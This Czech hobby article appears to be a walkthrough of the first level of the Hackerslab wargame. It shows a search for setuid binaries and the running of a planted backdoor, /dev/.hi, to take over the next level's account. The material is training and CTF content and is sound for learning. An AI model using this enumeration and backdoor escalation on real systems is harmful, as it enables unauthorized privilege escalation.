Zpět na seznam článků     Číst komentáře (2)     Verze pro tisk

Návod na Hackerslab - level 1

Autor: Kub@z   
16.8.2004

Hackerslab - další oblíbená hackerská hra


Hackerslab je oblíbená "hackerská" hra. Narozdíl od většiny jiných her zde jde skutečně o hackerské metody použité na systém Linux. Takže zde je návod na první level:

Nejdříve si najdeme (jako uživatel level 0) soubory, které by
se nám mohli hodit.

[level0@drill level0]$ ls -l `find / -perm +4000 2>/dev/null`
-rwsr-x--- 1 root wheel 14188 Mar 7 2000 /bin/su
-rwsr-x--- 1 level1 level0 13500 Dec 15 05:11 /dev/.hi
-rws--x--- 1 level10 level9 13577 Jul 10 20:55 /etc/bof
-rws--x--- 1 level16 level15 964040 Jul 5 2001 /etc/one
-rwsr-x--- 1 level6 level5 14306 Jul 10 21:05 /lib/security/pam_auth.so
-rwsr-x--- 1 level1 level0 13500 Jan 1 18:58 /tmp/.astral
-rwsr-sr-x 1 level3 level3 310640 Jan 1 14:39 /tmp/TG
-rwsr-xr-x 1 level3 level3 310640 Jan 1 14:48 /tmp/sh
-rwsr-x--- 1 level3 level2 13469 Jul 5 23:10 /usr/bin/alert
-rwsr-x--- 1 level2 level1 13987 Jul 5 23:05 /usr/bin/amos
-rws--x--- 1 level9 level8 15739 Jul 5 2001 /usr/bin/ps2
-rwsr-x--- 1 level5 level4 31416 Jul 11 13:24 /usr/games/trojka
-rws--x--- 1 level17 level16 963025 Jul 5 2001 /usr/local/bin/format
-rws--x--- 1 level12 level11 14705 Jul 10 21:01 /usr/local/bin/hof
-rws--x--- 1 level4 level3 13781 Jul 5 22:59 /usr/man/pt_BR/man8/today


To ls je tam kvůli tomu, abychom viděli komu ten soubor patří.
V celé hře si dávejte pozor na to, že např. "a" není to samé jako "A" !!!
Hesla nebudu prozrazovat, abyste si museli zahrát :)


Level 0


Nápověda:

It's a good thing that someone was nice enough to install a backdoor.
Your task is to use this backdoor to get to the next level.
First, telnet to drill.hackerslab.org.
HINT: Start looking in the device driver directory.

Úkol:

Najít "trojana" a získat heslo pro další level

Řešení:

jak už bylo v nápovědě řečeno, trojan se nachází v /dev.
jeho jméno je .hi

takže:

[level0@drill level0]$ cd /dev
[level0@drill /dev]$ ./.hi
[level0@drill /dev]$ whoami (pro jistotu :)
level1
[level0@drill /dev]$ pass


A máme to.

Líbil se Vám článek?
Budeme potěšeni, pokud vás zaujme také reklamní nabídka

Social Bookmarking

     





Hodnocení/Hlasovalo: 3.5/6

1  2  3  4  5    
(známkování jako ve škole)